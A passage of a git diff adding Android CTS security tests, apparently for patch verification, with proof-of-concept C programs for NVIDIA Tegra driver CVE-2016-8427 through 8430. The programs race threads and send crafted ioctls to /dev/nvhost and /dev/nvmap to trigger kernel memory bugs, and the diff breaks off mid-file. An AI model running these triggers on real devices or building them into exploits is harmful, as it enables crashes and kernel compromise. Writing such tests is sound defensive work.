+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ printf("[+] create close thread %d failed %d %s\n", i, errno, strerror(errno));
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ printf("[+] %03d times\n", i);
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
new file mode 100644
index 0000000..131f240
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8427
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
new file mode 100644
index 0000000..0c54420
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <linux/ion.h>
+
+#define NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL 0xc0084401ul
+
+
+int fd_gpu;
+int fd_dbg;
+int fd_dbg_1;
+
+void *thr(void *arg)
+{
+ int ioarg[2];
+ switch ((long)arg) {
+ case 0:
+ fd_dbg = open("/dev/nvhost-dbg-gpu",0x0ul,0x101000ul);
+ break;
+ case 1:
+ fd_dbg_1 = dup3(fd_dbg, fd_dbg,0x80000ul);
+ break;
+ case 2:
+ ioarg[0] = fd_dbg_1;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg, 0, 0, 0);
+ break;
+ case 3:
+ fd_gpu = open("/dev/nvhost-gpu",0x0ul,0x2000ul);
+ break;
+ case 4:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ case 5:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ }
+ return 0;
+}
+int poc()
+{
+ long i;
+ pthread_t th;
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ usleep(10000);
+ }
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ if (i%2==0)
+ usleep(10000);
+ }
+ usleep(100000);
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ while(1){
+ pid = fork();
+ if(pid){
+ usleep(30000);
+ }else
+ return poc();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
new file mode 100644
index 0000000..21326f9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8428
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
new file mode 100644
index 0000000..b65b16c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
@@ -0,0 +1,213 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_cache_op_list {
+ __u64 handles; /* Ptr to u32 type array, holding handles */
+ __u64 offsets; /* Ptr to u32 type array, holding offsets
+ * into handle mem */
+ __u64 sizes; /* Ptr to u32 type array, holindg sizes of memory
+ * regions within each handle */
+ __u32 nr; /* Number of handles */
+ __s32 op; /* wb/wb_inv/inv */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18, struct nvmap_cache_op_list)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+enum {
+ NVMAP_PAGES_UNRESERVE = 0,
+ NVMAP_PAGES_RESERVE
+};
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_alloc_handle g_real_alloc = {0};
+struct nvmap_cache_op_list g_op_list = {0};
+#define MAX_HANDLE_NUM (1000)
+int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
+int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+int trigger_nvmap_create() {
+ g_allocation->handle = -1;
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
+ return g_allocation->handle;
+}
+
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.handle = handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+ printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
+}
+
+void trigger_nvmap_free(int handle) {
+ ioctl(g_fd, NVMAP_IOC_FREE, handle);
+ printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ int i;
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 0x40;
+
+ g_real_alloc.align = 0x40;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+
+ g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
+ g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
+ g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ ((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
+ }
+ g_op_list.nr = MAX_HANDLE_NUM;
+ g_op_list.op = NVMAP_PAGES_RESERVE;
+}
+
+
+void create_handles() {
+ int i;
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ g_handles_for_alloc[i] = trigger_nvmap_create();
+ }
+
+}
+
+
+void trigger_rw_handle(int handle) {
+ ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
+ printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
+}
+
+int main(int argc, char**argv) {
+ int i;
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ prepare_data();
+ create_handles();
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_nvmap_alloc(g_handles_for_alloc[i]);
+ }
+
+ printf("[*] Begin to trigger bug....\n");
+ sleep(1);
+
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_rw_handle(g_handles_for_alloc[i]);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
new file mode 100644
index 0000000..bfe8718
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
new file mode 100644
index 0000000..293f617
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_create_handle g_allocation_dup;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+}
+
+void trigger_nvmap_create_dup(int fd) {
+ g_allocation_dup.fd = fd;
+ ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
+}
+
+void trigger_nvmap_alloc() {
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ alloc.handle = g_allocation->handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+}
+
+void trigger_nvmap_free(int fd) {
+ ioctl(g_fd, NVMAP_IOC_FREE, fd);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void prepare_data() {
+ void* data = (void *) memalign(0x1000, 4 * 0x1000);
+ //void* data = malloc(0x10000);
+ printf("[*] data = %p\n", data);
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+ g_allocation->handle = -1;
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-10, 2);
+
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+
+ while (1)
+ close(1024);
+}
+
+int main(int argc, char**argv) {
+
+ setup_privi_and_affinity(-10, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_nvmap_create();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
new file mode 100644
index 0000000..839047b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8430
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
new file mode 100644
index 0000000..0717d0b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
@@ -0,0 +1,204 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+#include <stdlib.h>
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+#define NVMAP_IOC_MAGIC 'N'
+
+/* Creates a new memory handle. On input, the argument is the size of the new
+ * handle; on return, the argument is the name of the new handle
+ */
+ #define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+int g_fd = -1;
+int g_nvmap_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+int g_channel_fd = -1;
+struct nvhost_set_error_notifier g_error_notifier;
+struct nvmap_create_handle g_nvmap_hdl;
+
+struct nvmap_alloc_handle g_real_alloc = {0};
+
+int open_driver() {
+ char* dev_path = "/dev/nvhost-vic";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+
+ dev_path = "/dev/nvmap";
